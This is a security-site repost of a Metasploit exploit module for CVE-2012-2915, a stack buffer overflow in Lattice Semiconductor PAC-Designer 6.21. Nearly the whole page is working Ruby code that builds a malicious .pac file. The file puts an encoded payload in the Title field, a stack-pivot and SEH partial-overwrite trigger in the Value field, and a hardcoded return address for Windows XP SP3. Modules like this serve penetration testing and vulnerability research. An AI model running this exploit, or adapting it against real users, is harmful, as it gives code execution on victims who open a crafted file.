首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-06-15  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
			'Description'    => %q{
					This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
				6.21.  As a .pac file, when supplying a long string of data to the 'value' field
				under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
				on the stack, which results in arbitrary code execution under the context of the
				user.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Unknown',      #Discovery
					'juan vazquez', #Metasploit
					'sinn3r'        #Metasploit
				],
			'References'     =>
				[
					['CVE', '2012-2915'],
					['OSVDB', '82001'],
					['EDB', '19006'],
					['BID', '53566'],
					['URL', 'http://secunia.com/advisories/48741']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00\x3c\x3e",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "seh"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'PAC-Designer 6.21 on Windows XP SP3',
						{
							# P/P/R in PACD621.exe
							# ASLR: False, Rebase: False, SafeSEH: False, OS: False
							'Ret' => 0x00805020
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 16 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
			], self.class)
	end

	def exploit
		# The payload is placed in the <title> field
		p = payload.encoded

		# The trigger is placed in the <value> field, which will jmp to our
		# payload in the <title> field.
		buf  = "\x5f"    #POP EDI
		buf << "\x5f"    #POP EDI
		buf << "\x5c"    #POP ESP
		buf << "\x61"*6  #POPAD x 6
		buf << "\x51"    #PUSH ECX
		buf << "\xc3"    #RET
		buf << rand_text_alpha(96-buf.length, payload_badchars)
		buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"  #Jmp back to the beginning of the buffer
		buf << [target.ret].pack('V')[0,3] # Partial overwrite

		xml = %Q|<?xml version="1.0"?>
<PacDesignData>
	<DocFmtVersion>1</DocFmtVersion>
	<DeviceType>ispPAC-CLK5410D</DeviceType>
	<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
	<SummaryInformation>
		<Title>#{p}</Title>
		<Author>#{Rex::Text.rand_text_alpha(6)}</Author>
	</SummaryInformation>

	<SymbolicSchematicData>
		<Symbol>
			<SymKey>153</SymKey>
			<NameText>Profile 0 Ref Frequency</NameText>
			<Value>#{buf}</Value>
		</Symbol>
	</SymbolicSchematicData>
</PacDesignData>|

		file_create(xml)
	end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ComSndFTP 1.3.7 Beta USER Buff
·CastRipper 2.9.6 BOF (bypass A
·MS12-037 Internet Explorer Sam
·Lattice Semiconductor PAC-Desi
·Adobe Illustrator CS5.5 Memory
·TFM MMPlayer (m3u/ppl File) Bu
·ESRI ArcGIS 10.0.X / ArcMap 9
·Karafun Player 1.20.86 .m3u Cr
·Wyse Machine Remote Power off
·Microsoft XML Core Services MS
·XM Easy Personal FTP Server v
·PHP apache_request_headers Fun
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved